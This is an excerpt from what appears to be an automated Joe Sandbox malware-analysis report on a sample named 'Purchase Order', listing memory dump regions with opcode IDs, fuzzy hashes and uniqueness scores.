                                                                            • Opcode Fuzzy Hash: abb710c2b31e9d110a5a663a1fa4c25f340af63b3f517c78f27685b253925369
                                                                            • Instruction Fuzzy Hash: F8019A71E1121ADFCF44EFA9C8419EEBBB5BF48215F108569D419E7250E7789A028BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: db9b94b359b8f752da413b21f3f550c5df978f735bdcea045463df15bb347ee1
                                                                            • Instruction ID: e2293ffe7695bc3e23e35dea74098ee22e0348ad8566ecd6e98c1ffb180f409a
                                                                            • Opcode Fuzzy Hash: db9b94b359b8f752da413b21f3f550c5df978f735bdcea045463df15bb347ee1
                                                                            • Instruction Fuzzy Hash: FFF05E773042197B8F069E99A8549AF7AABEBC8260B404429FA09C7351DE31981197A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2bbdeb59e7cb0b042a4112ff7ec58050e16e39fc717b655326e3967fe001b4e
                                                                            • Instruction ID: bd9f359af1b7bae87c2938edd8883f1268128e3086fd617f1e626f3ebe6db294
                                                                            • Opcode Fuzzy Hash: c2bbdeb59e7cb0b042a4112ff7ec58050e16e39fc717b655326e3967fe001b4e
                                                                            • Instruction Fuzzy Hash: 5CE08632D2063A93C711E7A5DC616DFBB38EF81265F544522D414B7140FB71265982F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e969eeddd123a442700fe011198193aeb6b3a48413f479d22a3211030fa9242
                                                                            • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                            • Opcode Fuzzy Hash: 3e969eeddd123a442700fe011198193aeb6b3a48413f479d22a3211030fa9242
                                                                            • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                            • Instruction ID: 6c148a2bcfa08228a38071392403389325c18410193e4360ba84308297fc4788
                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                            • Instruction Fuzzy Hash: DEC0127320C1382AA225508E7C40AA7AACCE2C63B4A250137F91CAB282A8429C8001A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7408394ed11124fc65f3aecf1aaba2c758f0db4d11b90142774338749b2ef4c1
                                                                            • Instruction ID: 6c06f8b42db350161fa56b9b802ef911a170ff62f108be261acdd2346d0e639e
                                                                            • Opcode Fuzzy Hash: 7408394ed11124fc65f3aecf1aaba2c758f0db4d11b90142774338749b2ef4c1
                                                                            • Instruction Fuzzy Hash: 51D0173AB010089FCF048F8CE8508DDFBB6FB9C221B008026F911A3220C6319821CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 43605e635c9514a9fbe53a454d935b0f35ea5f38e6d700683e940ad4558d44fc
                                                                            • Instruction ID: 1fa01ec1584266e8e7396128e14075aadbdd95e31db4aa7dfe43012fe1cc4bfc
                                                                            • Opcode Fuzzy Hash: 43605e635c9514a9fbe53a454d935b0f35ea5f38e6d700683e940ad4558d44fc
                                                                            • Instruction Fuzzy Hash: 75D02B7052830A06C306F321ED670503726B680205BE8499778004E219E638084C4630
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1578f576a2ccf48d8fea27c5e11dc7c99057bda9b63a3bbadd481ef1721cc320
                                                                            • Instruction ID: 0e06538c89e0773385a3f57a1103fc8f09602ade1d26a57a049c5ba0efe4ae7f
                                                                            • Opcode Fuzzy Hash: 1578f576a2ccf48d8fea27c5e11dc7c99057bda9b63a3bbadd481ef1721cc320
                                                                            • Instruction Fuzzy Hash: D0C0127013830F47C745F776E995555376FB7C0214F744951B50A0A119EE78189C4AB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "$0o@p$Haq$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                            • API String ID: 0-401091292
                                                                            • Opcode ID: 402a662e71abe74aca159b40c51e75aa457a9445acf6fbe0af45be45869aae7d
                                                                            • Instruction ID: 52a62227c3abfe11eb4f3fe7b4a990f931bcead74f3678e3cfb31d6993a216f8
                                                                            • Opcode Fuzzy Hash: 402a662e71abe74aca159b40c51e75aa457a9445acf6fbe0af45be45869aae7d
                                                                            • Instruction Fuzzy Hash: BF12D5B4E002188FDB58DF69C994B9DBBF2BF89300F1081A9D809AB355DB755E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .5uq
                                                                            • API String ID: 0-910421107
                                                                            • Opcode ID: 3ec8ed0e55eef732c32c31840f71d854baa7bcbe64ea4816386de675976cfa4e
                                                                            • Instruction ID: a98e59dbe5fb7700925108a0224bf14a1ac09d4a2ed80b9d1bfc8c652244bd66
                                                                            • Opcode Fuzzy Hash: 3ec8ed0e55eef732c32c31840f71d854baa7bcbe64ea4816386de675976cfa4e
                                                                            • Instruction Fuzzy Hash: A7528F74A01229CFDB64DF69C894BDDBBB2BF89300F1485EAD409AB254DB319E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p
                                                                            • API String ID: 0-848860569
                                                                            • Opcode ID: c4d714a0ca48df84d50f81f23c82e011dc31d198621b84d0bd8246bb8c515f72
                                                                            • Instruction ID: 9b102da42682e8da7190f4f8cb7f0de7a7af80bc15f4e99308fb12eb281dbb32
                                                                            • Opcode Fuzzy Hash: c4d714a0ca48df84d50f81f23c82e011dc31d198621b84d0bd8246bb8c515f72
                                                                            • Instruction Fuzzy Hash: D4B18574E10218CFDB54DFA9D894A9DBBB2FF89310F1181A9D819AB365DB30AD41CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0o@p
                                                                            • API String ID: 0-848860569
                                                                            • Opcode ID: dc41fefe7d79c231aaadf34352a200b6d94973d278ee6b2e29ce0a4d5b7ab616
                                                                            • Instruction ID: 98eba6411393f1a9b09d4f8bb0d7fe932f44965278f4d71895458762ea3c0c82
                                                                            • Opcode Fuzzy Hash: dc41fefe7d79c231aaadf34352a200b6d94973d278ee6b2e29ce0a4d5b7ab616
                                                                            • Instruction Fuzzy Hash: 3551A474E006488FDB48DFAAD99499DBBF2FF89310F14C16AD819AB364DB349942CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2448634e3bba8a4cd485289a933b49cc8ad1878ca58efb3539b5e7e57468aa7b
                                                                            • Instruction ID: 422d7328c41cbe3c7961f0296ad9d382b91c5168d05dc0d5ba4718e1dd4b1045
                                                                            • Opcode Fuzzy Hash: 2448634e3bba8a4cd485289a933b49cc8ad1878ca58efb3539b5e7e57468aa7b
                                                                            • Instruction Fuzzy Hash: 8AC1B074E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB364DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ef8700b2592271660a6cdde872c56b50d640bef1187d13749887f484abbd537
                                                                            • Instruction ID: 8ef8fb0da975a904ca6044c76c1ff2557ba24308199f871a18fcfabdbf2232ae
                                                                            • Opcode Fuzzy Hash: 2ef8700b2592271660a6cdde872c56b50d640bef1187d13749887f484abbd537
                                                                            • Instruction Fuzzy Hash: C0C19274E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD409AB354DB356E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0fcc735eb8a1f9356b33fdc799e4b06df2b68f090bb204a81160057adcc23ce
                                                                            • Instruction ID: c891815674a4a05de70f1ae987b2a4eb6ba205d2abc4c1ba41d42678a053ba62
                                                                            • Opcode Fuzzy Hash: a0fcc735eb8a1f9356b33fdc799e4b06df2b68f090bb204a81160057adcc23ce
                                                                            • Instruction Fuzzy Hash: 91C1B274E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD409AB354DB356A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a252e94566ffb9bc4758d35dcd2b6f788757b38b31e070f7fdaa57dda3b555b
                                                                            • Instruction ID: f285762b3bbc06c6c061dd58bb912640b6c564e7e7d55195a71f54a5f723d79e
                                                                            • Opcode Fuzzy Hash: 3a252e94566ffb9bc4758d35dcd2b6f788757b38b31e070f7fdaa57dda3b555b
                                                                            • Instruction Fuzzy Hash: A0C19F74E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB364DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c3abcfb28f77c3252d957bf59f6392791018e8a93976eb42cf4299153fe74ca4
                                                                            • Instruction ID: 0014357500590549132533ad72cd53ec235b5f6e41d35b69b14674378f4da0fc
                                                                            • Opcode Fuzzy Hash: c3abcfb28f77c3252d957bf59f6392791018e8a93976eb42cf4299153fe74ca4
                                                                            • Instruction Fuzzy Hash: DDC1A174E01219CFDB54DFA5C994B9DBBB2BF89300F2081AAD809AB364DB355E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1ee8346dbe58fbff484bcfa969e76f67397df32a098d975892eda93480953f3
                                                                            • Instruction ID: 84418ccc9c4c2bf7777c5c7f7685bd38a6890cc99d08aca1012da61cb5bf9a65
                                                                            • Opcode Fuzzy Hash: a1ee8346dbe58fbff484bcfa969e76f67397df32a098d975892eda93480953f3
                                                                            • Instruction Fuzzy Hash: EDC1A274E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB354DB359E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9b1411a133c77606c83137c0754ef3a324a2efeb2dc932509aa03c8a77b5b864
                                                                            • Instruction ID: 37ac23c950915e6588cac92426eb72a8d98815d32bc487d63b84ed6a0990a867
                                                                            • Opcode Fuzzy Hash: 9b1411a133c77606c83137c0754ef3a324a2efeb2dc932509aa03c8a77b5b864
                                                                            • Instruction Fuzzy Hash: FAC1AE74E01219CFDB54DFA5C994B9DBBB2BF89300F2080AAD809AB364DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 847f3f8b067239ee71721721dc4f85c83c2b41021bf3a3b2e435584031200223
                                                                            • Instruction ID: 7f57a4952a2b9c335ead1cff8eaf051112e54207de44473dafceadc12e3c4ae2
                                                                            • Opcode Fuzzy Hash: 847f3f8b067239ee71721721dc4f85c83c2b41021bf3a3b2e435584031200223
                                                                            • Instruction Fuzzy Hash: C0C1AF74E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB364DB355E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3c01b8c5120857a1d8eb89d5067012ef9dcc60f6b7efb28714ba66812e02b654
                                                                            • Instruction ID: 7e8b470b75abd81ac0fe1c240d15e4c4a83d52422a43864a3753be2a19dac091
                                                                            • Opcode Fuzzy Hash: 3c01b8c5120857a1d8eb89d5067012ef9dcc60f6b7efb28714ba66812e02b654
                                                                            • Instruction Fuzzy Hash: F4C19074E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB364DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbfed4a72bfca2d68e7a399e3e49939e9e94d91af33adf13459595db387a1a1b
                                                                            • Instruction ID: ac8f167c1bdf19df376bad7e0bea11776ae7052125eaaa8af68c84d0cb069d9f
                                                                            • Opcode Fuzzy Hash: dbfed4a72bfca2d68e7a399e3e49939e9e94d91af33adf13459595db387a1a1b
                                                                            • Instruction Fuzzy Hash: E6C1B174E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB364DB355E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b492dec051af7f58cddfcab3c32200b95cc840ea3000d3a4bda495161d9cc45
                                                                            • Instruction ID: c500c56b8923b640734dc1108e75e1ed8cc50b4258e109bbfa3b358334c03912
                                                                            • Opcode Fuzzy Hash: 1b492dec051af7f58cddfcab3c32200b95cc840ea3000d3a4bda495161d9cc45
                                                                            • Instruction Fuzzy Hash: 10C1A274E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD409AB364DB356A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b9453b4586b527b53f850b116d3feb0d9dedff72a6b4261fb0d7a67623b1b55e
                                                                            • Instruction ID: 97dc56912f5bd89add16473b6424d90ec914c32e007d34da5df572a65174da5b
                                                                            • Opcode Fuzzy Hash: b9453b4586b527b53f850b116d3feb0d9dedff72a6b4261fb0d7a67623b1b55e
                                                                            • Instruction Fuzzy Hash: 02C19174E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB364DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f52ff22f9b71e89bf790eb3303efa82bd0ea9fdee7f2fc10406d4750757d1997
                                                                            • Instruction ID: cda4f0f1ace382a7c629ba77e8a0f8d767be7ba5a0a8729b75ff02706acaef8e
                                                                            • Opcode Fuzzy Hash: f52ff22f9b71e89bf790eb3303efa82bd0ea9fdee7f2fc10406d4750757d1997
                                                                            • Instruction Fuzzy Hash: C5C1B274E01219CFDB54DFA5C994B9DBBB2BF89300F6080AAD809AB364DB355E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6a828b0935625dec66497f98269e43bdf96e9baa22a28fc4119eb356af953495
                                                                            • Instruction ID: 56fd7d5a6bd98a4b5e105e768cff652ab878a0f545e05434ef624d09aa6d4be2
                                                                            • Opcode Fuzzy Hash: 6a828b0935625dec66497f98269e43bdf96e9baa22a28fc4119eb356af953495
                                                                            • Instruction Fuzzy Hash: DEC19074E01219CFDB54DFA5C994B9DBBB2FF89300F6080AAD809AB354DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dee6e6aa4dec62989212b09fe3ca3837161594c3d861a6cf910d3b7f34a4e96d
                                                                            • Instruction ID: 25732a52f7ab91d100ebd6a304ec5b40f9ac5d74328716fc5f062f6846d56422
                                                                            • Opcode Fuzzy Hash: dee6e6aa4dec62989212b09fe3ca3837161594c3d861a6cf910d3b7f34a4e96d
                                                                            • Instruction Fuzzy Hash: 74C1A174E01219CFDB54DFA5C994B9DBBB2FF89300F2080AAD809AB354DB355A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \;]q$\;]q$\;]q$\;]q
                                                                            • API String ID: 0-2351511683
                                                                            • Opcode ID: 8c4bfc1cc4ee6a90690f9ec865f715b34e9bab0c5378f05d6cbbe34217a27732
                                                                            • Instruction ID: 86ff467bbca6f144ad1247cbf9cd3961c74904ca198ac30708a638bf4675081f
                                                                            • Opcode Fuzzy Hash: 8c4bfc1cc4ee6a90690f9ec865f715b34e9bab0c5378f05d6cbbe34217a27732
                                                                            • Instruction Fuzzy Hash: A501A7727100258FDB689E2DC48092977E7BF8A760B354569ED06CF3F2DA31EC418790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%